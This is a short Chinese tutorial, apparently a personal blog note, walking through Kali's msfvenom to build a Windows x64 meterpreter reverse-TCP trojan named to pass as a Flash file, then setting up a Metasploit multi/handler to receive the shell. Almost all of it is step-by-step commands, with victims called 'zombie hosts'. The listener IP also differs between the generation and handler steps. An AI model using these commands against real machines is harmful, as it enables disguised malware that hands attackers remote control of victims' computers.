在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以这就只写一些关于msfvenom的东西。
这里就只是记录下生成一个程序的过程。
msfvenom
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线
1.首先还是得打开postgresqlroot@kali:~# service postgresql start
2.让我们正式开始吧,因为我的目标平台是一个win7 64 位,所以要找一个相应的载荷。
root@kali:~# msfvenom -l | grep windows | grep x64 | grep tcp
3.生成木马(默认路径是在home下)
lhost 填写自己本机的IP(因为这种木马是用反弹机制)
lport 为反弹端口(填写你打算监听的端口)
root@kali:~# msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.1.3 lport=443 -f exe X > flash_win7.exe
4.启动msfvenom
root@kali:~# msfconsole
5.通过msfconsole开始监听
root@kali:~# use exploit/multi/handler
6.设置监听的环境(肉鸡环境)
root@kali:~# set payload windows/x64/meterpreter_reverse_tcp
7.设置监听的ip(本地ip)
root@kali:~# set lhost 192.168.1.103
8.设置监听的端口(木马反弹的端口)
root@kali:~# set lport 443
9.开始监听
root@kali:~# exploit
10.当目标运行程序的时候,便能获得shell